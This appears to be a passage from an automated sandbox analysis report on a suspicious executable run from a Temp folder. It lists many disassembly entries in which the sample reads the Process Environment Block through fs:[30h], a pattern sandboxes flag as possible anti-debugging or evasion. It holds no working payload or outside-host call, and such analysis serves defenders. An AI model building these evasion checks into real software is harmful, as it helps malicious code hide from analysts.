          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]
